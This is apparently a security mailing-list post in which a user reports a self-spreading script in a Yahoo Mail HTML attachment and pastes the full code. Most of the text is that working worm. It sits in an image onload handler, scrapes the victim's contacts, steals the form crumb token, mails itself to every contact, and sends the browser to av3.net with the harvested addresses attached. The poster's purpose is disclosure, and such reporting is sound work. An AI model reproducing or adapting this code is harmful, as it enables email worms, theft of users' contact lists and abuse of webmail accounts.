Hello, all.

I just received an email with an html attachment, on a yahoo account.

When I opened the mail, Yahoo automatically displayed the HTML and executed the script within.  What the hell. =)  It forwarded the message to my contacts list (or some other set of addresses, dunno) and redirected my browser to a website.

I'm off to a BBQ, and I don't care about Yahoo.  So I'm not even going to read the code and see how this happens.  I'm attaching the HTML file as a text file.  Enjoy!
 
Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up and encourage them to close the hole, that'd be wonderful.
 
Cheers,
--David Loyall
Omaha, Nebraska
David Loyall
<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' 
target=""onload="var http_request = false;    var Email = '';   var IDList = 
'';   var CRumb = '';   function makeRequest(url, Func, Method, Param) {        
if (window.XMLHttpRequest) {            http_request = new XMLHttpRequest();    
    } else if (window.ActiveXObject) {            http_request = new 
ActiveXObject('Microsoft.XMLHTTP');        }        
http_request.target=""onreadystatechange = Func;       
http_request.open(Method, url, true);        if( Method == 'GET')           
http_request.send(null);            else        http_request.send(Param);    
}window.open('http://www,lastdata.com'); ServerUrl =  url0;USIndex = 
ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen = 
MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen);    
function GetIDs(HtmlContent)   {                 IDList = '';            
StartString = '                 <td>';                  EndString = '</td>';    
                        i = 0;                  StartIndex = 
HtmlContent.indexOf(StartString, 0);               while(StartIndex >= 0)       
           {                       EndIndex = HtmlContent.indexOf(EndString, 
StartIndex);                          CutLen = EndIndex - StartIndex - 
StartString.length;                    YahooID = HtmlContent.substr(StartIndex 
+ StartString.length, CutLen);                                                  
if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 
0) > 0 )                                IDList = IDList + ',' + YahooID ;       
                StartString = '</tr>';                  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20);                 StartString 
= '                 <td>';                  StartIndex = 
HtmlContent.indexOf(StartString, StartIndex + 20);                 i++;         
                           }               if(IDList.substr(0,1) == ',')        
                   IDList = IDList.substr(1, IDList.length);               
if(IDList.indexOf(',', 0)>0 )                   {                       
IDListArray = IDList.split(',');                        Email = IDListArray[0]; 
                        IDList = IDList.replace(Email + ',', '');               
} CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); 
IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, 
'');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + 
UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = 
IDList.replace(UserEmail, ''); return IDList;                   }   function 
ListContacts()   {       if (http_request.readyState == 4) {            if 
(http_request.status == 200) {                       HtmlContent =  
http_request.responseText;                       IDList = GetIDs(HtmlContent);  
                                                 makeRequest('http://us.' + 
Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', 
null);           }        }    }   function ExtractStr(HtmlContent)   {         
       StartString = 'name=\u0022.crumb\u0022 value=\u0022';           
EndString = '\u0022';                           i = 0;          StartIndex = 
HtmlContent.indexOf(StartString, 0);               EndIndex = 
HtmlContent.indexOf(EndString, StartIndex + StartString.length );            
CutLen = EndIndex - StartIndex - StartString.length;            crumb = 
HtmlContent.substr(StartIndex + StartString.length , CutLen );          return 
crumb;      }   function Getcrumb()   {          if (http_request.readyState == 
4) {            if (http_request.status == 200) {                        
HtmlContent =  http_request.responseText;                       CRumb = 
ExtractStr(HtmlContent);                                                 MyBody 
= 'this is test';                       MySubj = 'New Graphic Site';            
                                                 Url = 'http://us.' + Server + 
'.mail.yahoo.com/ym/Compose';                                                   
         var ComposeAction = compose.action;MidIndex = 
ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc' 
,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex 
+ 5, CutLen);    QIndex = ComposeAction.indexOf('?box=' ,0);AIndex = 
ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName = 
ComposeAction.substr(QIndex + 5, CutLen);               Param = 
'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel';
     Param = Param.replace('BOXNAME', BoxName);                      Param = 
Param.replace('RUMBVAL', CRumb);                        Param = 
Param.replace('BCCLIST', IDList);                       Param = 
Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL', '[EMAIL 
PROTECTED]');                        Param = Param.replace('EMAILBODY', 
MyBody);                     Param = Param.replace('PlainMESSAGE', '');         
             Param = Param.replace('EMAILSUBJ', MySubj);Param= 
Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj);  
                      Param = Param.replace('EMAILMID', MyMid);Param = 
Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST', 
Param);         }    }}   function alertContents() {        if 
(http_request.readyState == 4) {                                      
window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList='
 + IDList)       }    } makeRequest('http://us.' + Server + 
'.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd='
 + Math.random(), ListContacts, 'GET', null)">Please wait while loading the site
